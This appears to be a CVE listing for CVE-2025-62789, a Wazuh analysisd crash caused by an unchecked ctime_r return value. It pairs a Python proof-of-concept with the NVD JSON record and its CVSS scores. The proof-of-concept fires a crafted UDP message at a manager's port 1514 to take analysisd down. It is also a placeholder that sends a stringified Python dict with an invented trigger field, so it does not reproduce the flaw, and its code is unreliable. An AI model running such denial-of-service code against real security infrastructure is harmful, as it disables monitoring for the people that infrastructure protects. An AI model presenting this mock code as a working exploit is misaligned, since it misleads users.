CVE-2025-62789

#!/usr/bin/env python3 # CVE-2025-62789 PoC - Wazuh fim_alert() NULL pointer dereference # This PoC demonstrates sending a crafted FIM message that can trigger the vulnerability import socket import struct import hashlib import time def build_crafted_fim_event(): """Build a specially crafted FIM event that triggers ctime_r to return NULL""" # This is a simplified representation of the attack concept # The actual exploitation requires specific filesystem conditions # where ctime_r returns NULL event = { 'type': 'file_integrity_check', 'path': '/tmp/malicious_file', 'timestamp': int(time.time()), 'mode': 'scheduled', 'trigger_condition': 'craft_ctime_null' } return event def send_to_manager(target_ip, target_port, event): """Send crafted FIM event to Wazuh manager""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Wazuh agents communicate on UDP port 1514 by default message = str(event).encode('utf-8') sock.sendto(message, (target_ip, target_port)) sock.close() print(f"[+] Crafted message sent to {target_ip}:{target_port}") print("[*] If ctime_r returns NULL in fim_alert(), analysisd will crash") except Exception as e: print(f"[-] Error: {e}") def main(): target_ip = "192.168.1.100" # Wazuh Manager IP target_port = 1514 # Wazuh Agent/Mgr communication port print("=" * 60) print("CVE-2025-62789 PoC - Wazuh fim_alert() DoS") print("=" * 60) event = build_crafted_fim_event() send_to_manager(target_ip, target_port, event) print("\n[*] Note: Actual exploitation requires specific conditions") print("[*] where ctime_r() returns NULL before strdup() is called") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62789", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.823", "lastModified": "2025-11-03T19:36:59.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, fim_alert() implementation does not check whether the return value of ctime_r is NULL or not before calling strdup() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-8rvq-mm2f-8q22", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}